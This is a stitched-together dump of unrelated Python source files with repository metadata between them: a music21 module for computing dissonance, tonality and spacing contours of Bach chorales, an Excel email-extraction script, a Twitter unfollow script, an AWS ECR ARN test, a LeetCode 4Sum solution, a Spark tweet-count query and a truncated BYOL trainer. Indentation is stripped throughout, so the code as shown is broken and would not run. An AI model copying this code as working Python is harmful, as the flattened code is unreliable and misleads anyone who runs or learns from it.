import unittest
from music21 import base # for _missingImport testing.
from music21 import repeat
from music21 import exceptions21
from music21 import corpus
from music21 import environment
_MOD = 'contour.py'
environLocal = environment.Environment(_MOD)
#---------------------------------------------------
class ContourException(exceptions21.Music21Exception):
pass
class OverwriteException(exceptions21.Music21Exception):
pass
def _getExtendedModules():
'''
this is done inside a def, so that the slow import of matplotlib is not done
in ``from music21 import *`` unless it's actually needed.
Returns a tuple: (plt, numpy, sp = None)
'''
if 'matplotlib' in base._missingImport:
raise ContourException(
'could not find matplotlib, contour mapping is not allowed (numpy is also required)')
if 'numpy' in base._missingImport:
raise ContourException('could not find numpy, contour mapping is not allowed')
import matplotlib.pyplot as plt
import numpy
return (plt, numpy)
class ContourFinder:
'''
ContourFinder is a class for finding 2-dimensional contours
of a piece based on different metrics.
Predefined metrics are 'dissonance', 'tonality', and 'spacing'.
To get a contour, use ContourFinder(myStream).getContour('dissonance'), for example.
If you wish to create your own metric for giving a numerical score to a stream, you can call
ContourFinder(myStream).getContour('myMetricName', metric=myMetric)
ContourFinder looks at a moving window of m measures, and moves that window by
n measures each time.
M and n are specified by 'window' and 'slide', which are both 1 by default.
>>> s = corpus.parse('bwv29.8')
>>> ContourFinder(s).plot('tonality')
TODO: image here...
'''
def __init__(self, s=None):
self.s = s # a stream.Score object
self.sChords = None #lazy evaluation...
self.key = None
self._contours = { } #A dictionary mapping a contour type to a normalized contour dictionary
#self.metrics contains a dictionary mapping the name of a metric to a tuple (x,y)
# where x=metric function and y=needsChordify
self._metrics = {"dissonance": (self.dissonanceMetric, True),
"spacing": (self.spacingMetric, True),
"tonality": (self.tonalDistanceMetric, False) }
self.isContourFinder = True
def setKey(self, key):
'''
Sets the key of ContourFinder's internal stream. If not set manually, self.key will
be determined by self.s.analyze('key').
'''
self.key = key
def getContourValuesForMetric(self, metric, window=1, slide=1, needChordified=False):
'''
Returns a dictionary mapping measure numbers to that measure's score under
the provided metric.
Ignores pickup measures entirely.
Window is a positive integer indicating how many measure the metric should
look at at once, and slide is
a positive integer indicating by how many measures the window should slide
over each time the metric is measured.
e.g. if window=4 and slide=2, metric = f, the result will be of the form:
{ measures 1-4: f(measures 1-4),
measures 3-6: f(measures 3-6),
measures 5-8: f( measures5-8), ...}
>>> metric = lambda s: len(s.measureOffsetMap())
>>> c = corpus.parse('bwv10.7')
>>> res = ContourFinder(c).getContourValuesForMetric(metric, 3, 2, False)
>>> resList = sorted(list(res.keys()))
>>> resList
[1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]
>>> [res[x] for x in resList]
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2]
OMIT_FROM_DOCS
>>> #set([1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]).issubset(set(res.keys()))
'''
res = {}
if needChordified:
if self.sChords is None:
self.sChords = self.s.chordify()
s = self.sChords
else:
s = self.s
mOffsets = s.measureOffsetMap()
hasPickup = repeat.RepeatFinder(s).hasPickup()
numMeasures = len(mOffsets) - hasPickup
for i in range(1, numMeasures + 1, slide): #or numMeasures-window + 1
fragment = s.measures(i, i + window - 1)
#TODO: maybe check that i+window-1 is less than numMeasures + window / 2
resValue = metric(fragment)
res[i] = resValue
return res
#TODO: tests that use simple 4-bar pieces that we have to create...
#ALSO: Need pictures or something! Need a clear demonstration!
def getContour(self, cType, window=None, slide=None, overwrite=False,
metric=None, needsChordify=False, normalized=False):
'''
Stores and then returns a normalized contour of the type cType.
cType can be either 'spacing', 'tonality', or 'dissonance'.
If using a metric that is not predefined, cType is any string that
signifies what your metric measures.
In this case, you must pass getContour a metric function which takes
in a music21 stream and outputs a score.
If passing a metric that requires the music21 stream be just chords,
specify needsChordify=True.
Window is how many measures are considered at a time and slide is the
number of measures the window moves
over each time. By default, measure and slide are both 1.
Each time you call getContour for a cType, the result is cached.
If you wish to get the contour
for the same cType more than once, with different parameters
(with a different window and slide, for example)
then specify overwrite=True
To get a contour where measures map to the metric values,
use normalized=False (the default), but to get a contour
which evenly divides time between 1.0 and 100.0, use normalized=True
>>> cf = ContourFinder( corpus.parse('bwv10.7'))
>>> mycontour = cf.getContour('dissonance')
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[0.0, 0.25, 0.5, 0.5, 0.0, 0.0, 0.25, 0.75, 0.0, 0.0, 0.5, 0.75, 0.75,
0.0, 0.5, 0.5, 0.5, 0.5, 0.75, 0.75, 0.75, 0.0]
>>> mycontour = cf.getContour('always one', 2, 2, metric= lambda x: 1.0)
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
>>> mycontour = cf.getContour('spacing', metric = lambda x: 2, overwrite=False)
Traceback (most recent call last):
OverwriteException: Attempted to overwrite 'spacing' metric but did
not specify overwrite=True
>>> mycontour = cf.getContour('spacing', slide=3, metric = lambda x: 2.0, overwrite=True)
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
>>> mycontour = cf.getContour('spacing')
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
'''
if overwrite is False:
if cType in self._contours:
if window is not None or slide is not None:
raise OverwriteException(
"Attempted to overwrite cached contour of type {0}".format(cType) +
" but did not specify overwrite=True")
else:
return self._contours[cType]
elif cType in self._metrics:
if metric is not None:
raise OverwriteException("Attempted to overwrite '{0}' ".format(cType) +
"metric but did not specify overwrite=True")
else:
metric, needsChordify = self._metrics[cType]
else:
self._metrics[cType] = (metric, needsChordify)
else:
if metric is None:
if cType in self._metrics:
metric, needsChordify = self._metrics[cType]
else:
raise ContourException("Must provide your own metric for type: %s" % cType)
if slide is None:
slide = 1
if window is None:
window = 1
contour = self.getContourValuesForMetric(metric, window, slide, needsChordify)
if normalized:
contour = self._normalizeContour(contour, 100.0)
self._contours[cType] = contour
return contour
def _normalizeContour(self, contourDict, maxKey):
'''
Normalize a contour dictionary so that the values of the keys range from 0.0 to length.
>>> mycontour = { 0.0: 1.0, 3.0: 0.5, 6.0: 0.8, 9.0: 0.3, 12.0: 0.15,
... 15.0: 0.13, 18.0: 0.4, 21.0: 0.6 }
>>> res = ContourFinder()._normalizeContour(mycontour, 100)
>>> resKeys = list(res.keys())
>>> resKeys.sort()
>>> contourKeys = list(mycontour.keys())
>>> contourKeys.sort()
>>> len(contourKeys) == len(resKeys)
True
>>> x = True
>>> for i in range(len(contourKeys)):
... if mycontour[contourKeys[i]] != res[resKeys[i]]:
... x = False
>>> x
True
>>> 100.0 in res
True
>>> 0.0 in res
True
'''
myKeys = list(contourDict.keys())
myKeys.sort()
numKeys = len(myKeys)
spacing = (maxKey)/(numKeys-1.0)
res = {}
i = 0.0
for j in myKeys:
res[round(i, 3)] = round(float(contourDict[j]), 5)
i += spacing
return res
#TODO: give same args as getContour, maybe? Also, test this.
def plot(self, cType, contourIn=None, regression=True, order=4,
title='Contour Plot', fileName=None):
(plt, numpy) = _getExtendedModules()
if contourIn is None:
if cType not in self._contours:
contourIn = self.getContour(cType)
else:
contourIn = self._contours[cType]
x = list(contourIn.keys())
x.sort()
y = [contourIn[i] for i in x]
plt.plot(x, y, '.', label='contour', markersize=5)
if regression:
p = numpy.poly1d(numpy.polyfit(x, y, order))
t = numpy.linspace(0, x[-1], x[-1] + 1)
plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label
plt.xlabel('Time (arbitrary units)')
plt.ylabel('Value for %s metric' % cType)
plt.title(title) #say for which piece
#plt.savefig(filename + '.png')
if fileName is not None:
plt.savefig(fileName + '.png')
else:
plt.show()
plt.clf()
def randomize(self, contourDict):
'''
Returns a version of contourDict where the keys-to-values mapping is scrambled.
>>> myDict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8, 9:9, 10:10, 11:11, 12:12, 13:13,
... 14:14, 15:15, 16:16, 17:17, 18:18, 19:19, 20:20}
>>> res = ContourFinder().randomize(myDict)
>>> res == myDict
False
>>> sorted(list(res.keys())) == sorted(list(myDict.keys()))
True
>>> sorted(list(res.values())) == sorted(list(myDict.values()))
True
'''
res = {}
myKeys = list(contourDict.keys())
myValues = list(contourDict.values())
random.shuffle(myKeys)
for i in range(len(myKeys)):
res[myKeys[i]] = myValues[i]
return res
#--- code for the metrics
def _calcGenericMetric(self, inpStream, chordMetric):
'''
Helper function which, given a metric value for a chord, calculates a metric
for a series of measures by taking the sum of each chord's metric value weighted by
its duration.
'''
score = 0
n=0
for measure in inpStream:
if 'Measure' in measure.classes:
for chord in measure:
if 'Chord' in chord.classes:
dur = chord.duration.quarterLength
score += chordMetric(chord)*dur
n += dur
if n != 0:
return score / n
else:
return None
def dissonanceMetric(self, inpStream):
'''
inpStream is a stream containing some number of measures which each contain chords.
Output is a number between 0 and 1 which is proportional to the number of dissonant chords.
To work correctly, input must contain measures and no parts.
>>> c = corpus.parse('bwv102.7').chordify()
>>> ContourFinder().dissonanceMetric( c.measures(1, 1) )
0.25
>>> ContourFinder().dissonanceMetric( c.measures(8, 8) )
0.5
>>> ContourFinder().dissonanceMetric( c.measures(1, 10)) < 1.0
True
'''
return self._calcGenericMetric(inpStream, lambda x: 1-x.isConsonant() )
def spacingMetric(self, inpStream):
'''
Defines a metric which takes a music21 stream containng measures and no parts.
This metric measures how spaced out notes in a piece are.
'''
#TODO: FIGURE OUT IF THIS IS REASONABLE! MIGHT WANT TO JUST DO: sqrt( sum(dist^2) )
def spacingForChord(chord):
pitches = [ x.ps for x in chord.pitches ]
pitches.sort()
res = 0
if len(pitches) <= 1:
return 0
elif len(pitches) == 2:
return (pitches[1] - pitches[0])
else:
res += (pitches[1] - pitches[0]) ** (0.7)
for i in range(1, len(pitches)-1):
res += (pitches[i + 1]-pitches[i]) ** (1.5)
return res
return self._calcGenericMetric(inpStream, spacingForChord)
def tonalDistanceMetric(self, inpStream):
'''
Returns a number between 0.0 and 1.0 that is a measure of how far away the key of
inpStream is from the key of ContourFinder's internal stream.
'''
if self.key is None:
self.key = self.s.analyze('key')
guessedKey = inpStream.analyze('key')
certainty = -2 #should be replaced by a value between -1 and 1
if guessedKey == self.key:
certainty = guessedKey.correlationCoefficient
else:
for pkey in guessedKey.alternateInterpretations:
if pkey == self.key:
certainty = pkey.correlationCoefficient
break
return (1 - certainty) / 2.0
class AggregateContour:
'''
An AggragateContour object is an object that stores and consolidates
contour information for a large group
of pieces.
To add a piece to the aggregate contour, use
AggregateContour.addPieceToContour(piece, cType), where cType is
the type of contour (the default possibilities are
'tonality', 'spacing', and 'dissonance'), and piece is either
a parsed music21 stream or a ContourFinder object.
To get the combined contour as list of ordered pairs, use
AggragateContour.getCombinedContour(), and to
get the combined contour as a polynomial approximation, use
AggragateContour.getCombinedContourPoly().
You can plot contours with AggragateContour.plotAggragateContour(cType).
To compare a normalized contour to the aggragate, use
AggragateContour.dissimilarityScore(cType, contour).
'''
def __init__(self, aggContours=None):
if aggContours is None:
self.aggContours = {}
# = {'spacing': [ {1:2, 2:3}, {...}, ...], 'tonality': [...], ... }
else:
self.aggContours = aggContours
self._aggContoursAsList = {}
self._aggContoursPoly = {}
def addPieceToContour(self, piece, cType, metric=None, window=1,
slide=1, order=8, needsChordify=False):
'''
Adds a piece to the aggregate contour.
piece is either a music21 stream, or a ContourFinder object (which
should have a stream wrapped inside of it).
cType is the contour type.
If using a metric that is not predefined, cType is any string
that signifies what your metric measures.
In this case, you must pass getContour a metric function
which takes in a music21 stream and outputs a score.
If passing a metric that requires the music21 stream be
just chords, specify needsChordify=True.
Window is how many measures are considered at a time and
slide is the number of measures the window moves
over each time. By default, measure and slide are both 1.
'''
if hasattr(piece, 'isContourFinder') and piece.isContourFinder:
pass
else:
piece = ContourFinder(piece)
contour = piece.getContour(cType, window=window, slide=slide,
overwrite=False, metric=metric,
needsChordify=needsChordify, normalized=True)
if cType not in self.aggContours:
self.aggContours[cType] = []
self.aggContours[cType].append(contour)
return
def getCombinedContour(self, cType): #, metric=None, window=1, slide=1, order=8):
'''
Returns the combined contour of the type specified by cType. Instead of a dictionary,
this contour is just a list of ordered pairs (tuples) with the
first value being time and the
second value being the score.
'''
if cType in self._aggContoursAsList:
return self._aggContoursAsList[cType]
elif cType in self.aggContours:
contour = self.aggContours[cType]
res = []
for contDict in contour:
res.extend( [ (x, contDict[x]) for x in contDict] )
self._aggContoursAsList[cType] = res
return res
else:
return None
def getCombinedContourPoly(self, cType, order=8):
'''
Returns the polynomial fit for the aggregate contour of type cType.
Order is the order of the resulting polynomial. e.g. For a linear regression, order=1.
'''
(unused_plt, numpy) = _getExtendedModules()
if cType in self._aggContoursPoly:
return self._aggContoursPoly[cType]
elif cType in self._aggContoursAsList:
contList = self._aggContoursAsList[cType]
elif cType in self.aggContours:
contList = self.getCombinedContour(cType)
else:
return None
x, y = zip(*contList)
self._aggContoursPoly[cType] = numpy.poly1d( numpy.polyfit(x, y, order))
return self._aggContoursPoly[cType]
def plot(self, cType, showPoints=True, comparisonContour=None, regression=True, order=6):
#TODO: maybe have an option of specifying a different
# color thing for each individual contour...
if cType not in self.aggContours: #['dissonance', 'tonality', 'distance']:
return None
else:
contour = self.getCombinedContour(cType)
# elif cType not in self._aggContoursAsList:
# contour = self.getCombinedContour(cType)
# else:
# contour = self._aggContoursAsList[cType]
#
(plt, numpy) = _getExtendedModules() #@UnusedVariable
x, y = zip(*contour)
if showPoints:
plt.plot(x, y, '.', label='contour', markersize=5)
if comparisonContour is not None:
x = comparisonContour.keys()
y = [comparisonContour[i] for i in x]
plt.plot(x, y, '.', label='compContour', markersize=8)
#p = numpy.poly1d( numpy.polyfit(x, y, order))
p = self.getCombinedContourPoly(cType)
if regression:
t = numpy.linspace(0, max(x), max(x) + 1)
plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label
plt.xlabel('Time (percentage of piece)')
plt.ylabel('Value') #change this
plt.title('title') #say for which piece
#plt.savefig(filename + '.png')
plt.show()
plt.clf()
def dissimilarityScore(self, cType, contourDict):
'''
Returns a score based on how dissimilar the input contourDict is from
the aggregate contour of type cType.
Requires contourDict be normalized with values from 1.0 to 100.0
'''
p = self.getCombinedContourPoly(cType)
return sum( [abs(contourDict[x] - p(x)) for x in contourDict] )
_DOC_ORDER = [ContourFinder, AggregateContour]
def _getOutliers():
BCI = corpus.chorales.Iterator(returnType='filename')
highestNum = BCI.highestNumber
currentNum = BCI.currentNumber
lengthDict = {}
for chorale in BCI:
print(currentNum)
if currentNum is not highestNum:
currentNum = BCI.currentNumber
s = corpus.parse(chorale)
if chorale == 'bach/bwv277':
continue
elif len(s.parts) != 4:
continue
rf = repeat.RepeatFinder(s)
s = rf.simplify()
lengthDict[chorale] = len(s.measureOffsetMap()) - rf.hasPickup()
return lengthDict
def _runExperiment():
#get chorale iterator, initialize ac
ac = AggregateContour()
#unresolved problem numbers: 88 (repeatFinder fails!)
goodChorales = ['bach/bwv330', 'bach/bwv245.22', 'bach/bwv431',
'bach/bwv324', 'bach/bwv384', 'bach/bwv379', 'bach/bwv365',
'bach/bwv298', 'bach/bwv351', 'bach/bwv341', 'bach/bwv421',
'bach/bwv420', 'bach/bwv331', 'bach/bwv84.5', 'bach/bwv253',
'bach/bwv434', 'bach/bwv26.6', 'bach/bwv64.2', 'bach/bwv313',
'bach/bwv314', 'bach/bwv166.6', 'bach/bwv414', 'bach/bwv264',
'bach/bwv179.6', 'bach/bwv67.7', 'bach/bwv273', 'bach/bwv373',
'bach/bwv376', 'bach/bwv375', 'bach/bwv151.5', 'bach/bwv47.5',
'bach/bwv197.10', 'bach/bwv48.3', 'bach/bwv88.7', 'bach/bwv310',
'bach/bwv244.46', 'bach/bwv153.1', 'bach/bwv69.6', 'bach/bwv333',
'bach/bwv104.6', 'bach/bwv338', 'bach/bwv155.5', 'bach/bwv345',
'bach/bwv435', 'bach/bwv323', 'bach/bwv245.3', 'bach/bwv144.3', 'bach/bwv405',
'bach/bwv406', 'bach/bwv316', 'bach/bwv258', 'bach/bwv254',
'bach/bwv256', 'bach/bwv257', 'bach/bwv69.6-a', 'bach/bwv86.6',
'bach/bwv388', 'bach/bwv308', 'bach/bwv307', 'bach/bwv244.32',
'bach/bwv268', 'bach/bwv260', 'bach/bwv110.7', 'bach/bwv40.3',
'bach/bwv164.6', 'bach/bwv9.7', 'bach/bwv114.7', 'bach/bwv364',
'bach/bwv291', 'bach/bwv245.17', 'bach/bwv297', 'bach/bwv20.11',
'bach/bwv319', 'bach/bwv244.3', 'bach/bwv248.35-3', 'bach/bwv96.6',
'bach/bwv48.7', 'bach/bwv337', 'bach/bwv334', 'bach/bwv101.7',
'bach/bwv168.6', 'bach/bwv55.5', 'bach/bwv154.3', 'bach/bwv89.6',
'bach/bwv2.6', 'bach/bwv392', 'bach/bwv395', 'bach/bwv401', 'bach/bwv408',
'bach/bwv259', 'bach/bwv382', 'bach/bwv244.37', 'bach/bwv127.5',
'bach/bwv44.7', 'bach/bwv303', 'bach/bwv263', 'bach/bwv262',
'bach/bwv248.46-5', 'bach/bwv13.6', 'bach/bwv377', 'bach/bwv416',
'bach/bwv354', 'bach/bwv244.10', 'bach/bwv288', 'bach/bwv285',
'bach/bwv113.8', 'bach/bwv393', 'bach/bwv360', 'bach/bwv363',
'bach/bwv367', 'bach/bwv90.5', 'bach/bwv245.11', 'bach/bwv5.7',
'bach/bwv289', 'bach/bwv83.5', 'bach/bwv359', 'bach/bwv352',
'bach/bwv102.7', 'bach/bwv394', 'bach/bwv227.11', 'bach/bwv244.40',
'bach/bwv244.44', 'bach/bwv424', 'bach/bwv244.25', 'bach/bwv80.8',
'bach/bwv244.54', 'bach/bwv78.7', 'bach/bwv57.8', 'bach/bwv194.6',
'bach/bwv397', 'bach/bwv64.8', 'bach/bwv318', 'bach/bwv315',
'bach/bwv153.5', 'bach/bwv39.7', 'bach/bwv108.6', 'bach/bwv386',
'bach/bwv25.6', 'bach/bwv417', 'bach/bwv415', 'bach/bwv302',
'bach/bwv380', 'bach/bwv74.8', 'bach/bwv422', 'bach/bwv133.6',
'bach/bwv270', 'bach/bwv272', 'bach/bwv38.6', 'bach/bwv271', 'bach/bwv183.5',
'bach/bwv103.6', 'bach/bwv287', 'bach/bwv32.6', 'bach/bwv245.26',
'bach/bwv248.5', 'bach/bwv411', 'bach/bwv369', 'bach/bwv339',
'bach/bwv361', 'bach/bwv399', 'bach/bwv16.6', 'bach/bwv419',
'bach/bwv87.7', 'bach/bwv4.8', 'bach/bwv358', 'bach/bwv154.8',
'bach/bwv278', 'bach/bwv156.6', 'bach/bwv248.33-3', 'bach/bwv81.7',
'bach/bwv227.7', 'bach/bwv427', 'bach/bwv77.6', 'bach/bwv410',
'bach/bwv329', 'bach/bwv85.6', 'bach/bwv385', 'bach/bwv309',
'bach/bwv305', 'bach/bwv18.5-l', 'bach/bwv18.5-w', 'bach/bwv197.5',
'bach/bwv30.6', 'bach/bwv296', 'bach/bwv292', 'bach/bwv353',
'bach/bwv301', 'bach/bwv347',
'bach/bwv284', 'bach/bwv429', 'bach/bwv436', 'bach/bwv430',
'bach/bwv381', 'bach/bwv36.4-2', 'bach/bwv412', 'bach/bwv65.7', 'bach/bwv280',
'bach/bwv169.7', 'bach/bwv428', 'bach/bwv346', 'bach/bwv248.12-2',
'bach/bwv426',
'bach/bwv159.5', 'bach/bwv121.6', 'bach/bwv418', 'bach/bwv28.6',
'bach/bwv326', 'bach/bwv327', 'bach/bwv321', 'bach/bwv65.2',
'bach/bwv144.6', 'bach/bwv194.12', 'bach/bwv398', 'bach/bwv317',
'bach/bwv153.9', 'bach/bwv300', 'bach/bwv56.5', 'bach/bwv423',
'bach/bwv306', 'bach/bwv40.6', 'bach/bwv123.6', 'bach/bwv245.28',
'bach/bwv279', 'bach/bwv378', 'bach/bwv366', 'bach/bwv45.7', 'bach/bwv295',
'bach/bwv245.14', 'bach/bwv122.6', 'bach/bwv355', 'bach/bwv357',
'bach/bwv94.8', 'bach/bwv348', 'bach/bwv349', 'bach/bwv312',
'bach/bwv325', 'bach/bwv245.37', 'bach/bwv37.6', 'bach/bwv283',
'bach/bwv299', 'bach/bwv294', 'bach/bwv245.15', 'bach/bwv176.6',
'bach/bwv391', 'bach/bwv350', 'bach/bwv400', 'bach/bwv372',
'bach/bwv402', 'bach/bwv282', 'bach/bwv374', 'bach/bwv60.5',
'bach/bwv356', 'bach/bwv389', 'bach/bwv40.8', 'bach/bwv174.5',
'bach/bwv340', 'bach/bwv433', 'bach/bwv322', 'bach/bwv403',
'bach/bwv267', 'bach/bwv261', 'bach/bwv245.40', 'bach/bwv33.6',
'bach/bwv269', 'bach/bwv266', 'bach/bwv43.11', 'bach/bwv10.7',
'bach/bwv343', 'bach/bwv311']
currentNum = 1
#BCI = corpus.chorales.Iterator(1, 371, returnType='filename') #highest number is 371
#highestNum = BCI.highestNumber
#currentNum = BCI.currentNumber
for chorale in goodChorales:
print(currentNum)
currentNum +=1
# '''
# if chorale == 'bach/bwv277':
# continue #this chorale here has an added measure
# # container randomly in the middle which breaks things.
# '''
chorale = corpus.parse(chorale)
# '''
# if len(chorale.parts) is not 4:
# print("chorale had too many parts")
# continue
# '''
chorale = repeat.RepeatFinder(chorale).simplify()
# '''
# length = len( chorale.measureOffsetMap() )
# if length < 10:
# print("too short")
# continue
# elif length > 25:
# print("too long")
# continue
# '''
cf= ContourFinder(chorale)
ac.addPieceToContour(cf, 'dissonance')
ac.addPieceToContour(cf, 'tonality')
ac.addPieceToContour(cf, 'spacing')
print(ac.aggContours['dissonance'])
print(ac.aggContours['tonality'])
print(ac.aggContours['spacing'])
for cType in ['spacing', 'tonality', 'dissonance']:
print("considering", cType, ": ")
cf = ContourFinder()
totalSuccesses = 0
totalFailures = 0
for j in range( len(ac.aggContours[cType])):
contDict = ac.aggContours[cType][j]
observed = ac.dissimilarityScore(cType, contDict)
successes = 0
for i in range(100):
randomized = ac.dissimilarityScore( cType, cf.randomize(contDict) )
if randomized > observed:
successes += 1
if successes > 50:
totalSuccesses += 1
#print "GREAT SUCCESS!"
else:
totalFailures += 1
print("failure: chorale " + goodChorales[j]) #index ", str(i)
print(cType, ": totalSuccesses =", str(totalSuccesses),
"totalFailures =", str(totalFailures))
def _plotChoraleContours():
BCI = corpus.chorales.Iterator(1, 75, returnType='filename')
for chorale in BCI:
s = corpus.parse(chorale)
cf = ContourFinder(s)
chorale = chorale[5:]
print(chorale)
#cf.plot('dissonance', fileName= chorale + 'dissonance', regression=False)
try:
cf.plot('tonality', fileName= chorale + 'tonality', regression=False)
except exceptions21.Music21Exception:
print(chorale)
s.show()
break
pass
#------------------------
class Test(unittest.TestCase):
def runTest(self):
pass
if __name__ == "__main__":
import music21
music21.mainTest(Test, 'moduleRelative')
| cuthbertLab/music21-tools | contour/contour.py | contour.py | py | 30,165 | python | en | code | 37 | github-code | 36 |
25952738898 | #encoding utf-8
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.worksheet.table import Table, TableStyleInfo
import os
import re
def salvar_email():
path = 'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
arquivo_excel = load_workbook(path)
separados = arquivo_excel.active # Le a planilha ativa
'''
# obter sheets
sheets = arquivo_excel.sheetnames
planilha1 = arquivo_excel[sheets[n]]
'''
#ler linha a linha
max_linha = separados.max_row
max_coluna = separados.max_column
contador = 1
for i in range(1, max_linha):
a1 = str(separados.cell(row=i, column=1, ).value)
#print(type(str(a1.value)))
#print(str(a1.value))
if re.search('\\SMTP\\b', a1, re.IGNORECASE):
email = a1.split(',')
for g in range(len(email)):
if re.search('ricardo.campos', email[g], re.IGNORECASE):
email[g] = "0"
if re.search('postmaster', email[g], re.IGNORECASE):
email[g] = "0"
if re.search('@', email[g], re.IGNORECASE):
email[g] = email[g][:-1]
email[g] = email[g][1:]
# setando nova planilha para gravação (OBS não desativa a planilha ativa)
result = arquivo_excel['result']
result.cell(row=contador, column=2).value = email[g]
contador = contador + 1
print(email[g])
arquivo_excel .save(path)
os.system("PAUSE")
def retira():
path = 'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
arquivo_excel = load_workbook(path)
# obter sheets B 01 -Intelbras
sheets = arquivo_excel.sheetnames
print(sheets)
sheet1 = arquivo_excel[sheets[0]]
sheet2 = arquivo_excel[sheets[1]]
sheet3 = arquivo_excel[sheets[2]]
# ler linha a linha
max_linha = sheet3.max_row
max_coluna = sheet3.max_column
contador = 1
for i in range(1, max_linha):
a1 = str(sheet3.cell(row=i, column=2, ).value)
#a1 = a1.split(' ')
print(a1[5:])
sheet2.cell(row=contador, column=4).value = a1[5:]
contador = contador + 1
arquivo_excel.save(path)
os.system("PAUSE")
#salvar_email()
retira()
| ricardocvel/buscarEmail_excel- | inteirarExcel.py | inteirarExcel.py | py | 2,400 | python | pt | code | 0 | github-code | 36 |
34729716556 | #!/usr/bin/python3
from twitter import *
import time
import json
with open('./conf.json') as file: conf = json.load(file)
tw = Twitter(auth=OAuth(conf['token'], conf['token_key'], conf['con_sec'], conf['con_sec_key']))
maxcount = 5000
friends = []
followers = []
res = tw.friends.ids(count=maxcount)
cursor = -1
while cursor != 0:
for id in res['ids']: friends.append(id)
cursor = res['next_cursor']
res = tw.friends.ids(count=maxcount,cursor=cursor)
res = tw.followers.ids(count=maxcount)
cursor = -1
while cursor != 0:
for id in res['ids']: followers.append(id)
cursor = res['next_cursor']
res = tw.followers.ids(count=maxcount,cursor=cursor)
print("%s friends (users subscribed by the account)." % len(friends))
print("%s followers (users following the account)." % len(followers))
print("\n")
friendsOnly = list(set(friends) - set(followers))
for uid in friendsOnly:
print("uid: %s" % uid)
res = tw.friendships.destroy(user_id=uid)
print("%i friendsOnly removed : %s\n" % (len(friendsOnly), friendsOnly))
| jdxlabs/twitter_diff | remove_friendsonly.py | remove_friendsonly.py | py | 1,048 | python | en | code | 0 | github-code | 36 |
42350249999 | from flask import jsonify
from pyspark.sql import SparkSession
import matplotlib.pyplot as plt
import pandas as pd
import io
spark = SparkSession \
.builder \
.appName("Tweets Analysis using Python Saprk") \
.getOrCreate()
# spark is an existing SparkSession
df = spark.read.json("importedtweetsdata.json")
# Register the DataFrame as a SQL temporary view
df.createOrReplaceTempView("MobileTweetsData")
resultdf = spark.sql("SELECT SUBSTR(created_at, 0, 20) tweetsDate, COUNT(1) tweetsCount FROM MobileTweetsData \
where text is not null GROUP BY SUBSTR(created_at, 0, 20) ORDER BY COUNT(1) DESC LIMIT 5")
pd = resultdf.toPandas()
pd.to_csv('Query4Result.csv', index=False)
def query4_output():
#return pd.to_json(orient='records')
return jsonify({"Results":pd.to_json(orient='records')})
def query4_plot():
pd.plot(kind="bar", x="tweetsDate", y="tweetsCount",
title="Number of tweets for date")
image = io.BytesIO()
plt.savefig(image, format='png')
image.seek(0)
return image
| pujithasak/TweetsAnalysisPythonProject | AnalysisQuery4.py | AnalysisQuery4.py | py | 1,055 | python | en | code | 0 | github-code | 36 |
23411614254 | # -*- coding: utf-8 -*-
from aws_arns.srv.ecr import (
EcrRepository,
)
def test():
arn = "arn:aws:ecr:us-east-1:123456789012:repository/my-repo"
repo = EcrRepository.from_arn(arn)
uri = repo.uri
assert repo.repo_name == "my-repo"
assert EcrRepository.from_uri(uri) == repo
assert (
EcrRepository.new(
aws_region=repo.region,
aws_account_id=repo.account_id,
repo_name=repo.repo_name,
)
== repo
)
if __name__ == "__main__":
from aws_arns.tests.helper import run_cov_test
run_cov_test(__file__, "aws_arns.srv.ecr", preview=False)
| MacHu-GWU/aws_arns-project | tests/srv/test_ecr.py | test_ecr.py | py | 635 | python | en | code | 0 | github-code | 36 |
71075259305 | class Solution:
def fourSum(self, nums: List[int], target: int) -> List[List[int]]:
def ksum(nums,target,k):
ans=[]
if len(nums)==0 or nums[0]*k>target or nums[-1]*k<target:
return ans
if k==2:
return twosum(nums,target)
for i in range(len(nums)):
if i==0 or nums[i-1]!=nums[i]:
for subset in ksum(nums[i+1:],target-nums[i],k-1):
ans.append([nums[i]]+subset)
return ans
def twosum(numss,target):
ans=[]
l=0
r=len(numss)-1
while l<r:
two_sum=numss[l]+numss[r]
if two_sum==target:
ans.append([numss[l],numss[r]])
l+=1
r-=1
while l<r and numss[l]==numss[l-1]:
l+=1
while l<r and numss[r]==numss[r+1]:
r-=1
elif two_sum>target:
r-=1
else:
l+=1
return ans
nums.sort()
return ksum(nums,target,4) | nango94213/Leetcode-solution | 18-4sum/18-4sum.py | 18-4sum.py | py | 1,216 | python | en | code | 2 | github-code | 36 |
42262216968 | import os
import math
import multiprocessing
from tqdm import tqdm
from argparse import Namespace
from typing import Iterable, Optional
mp = multiprocessing.get_context("spawn")
from utils import _create_model_training_folder
import torch
import torch.nn.functional as F
import torchvision
from torch.nn.parameter import Parameter
from torch.utils.tensorboard import SummaryWriter
from tspipe import TSPipe
from tspipe.profiler import profile_semantic
from tspipe.dataloader import FastDataLoader, DummyInputGenerator
class BYOLTrainer:
def __init__(self, online_network, target_network, predictor, optimizer, device, scheduler, **params):
self.online_network = online_network
self.target_network = target_network
self.optimizer = optimizer
self.device = device
self.predictor = predictor
self.max_epochs = params['max_epochs']
self.writer = SummaryWriter()
self.m = params['m']
self.batch_size = params['batch_size']
self.num_workers = params['num_workers']
self.checkpoint_interval = params['checkpoint_interval']
self.image_x = eval(params['input_shape'])[0]
self.scheduler = scheduler
_create_model_training_folder(self.writer, files_to_same=["./config/config.yaml", "main.py", 'trainer.py'])
self.dummy_input = True if params['dummy_input'] == True else False
if self.dummy_input:
print("Warning: Dummy Input Enabled.")
@torch.no_grad()
def _update_target_network_parameters(self):
"""
Momentum update of the key encoder
"""
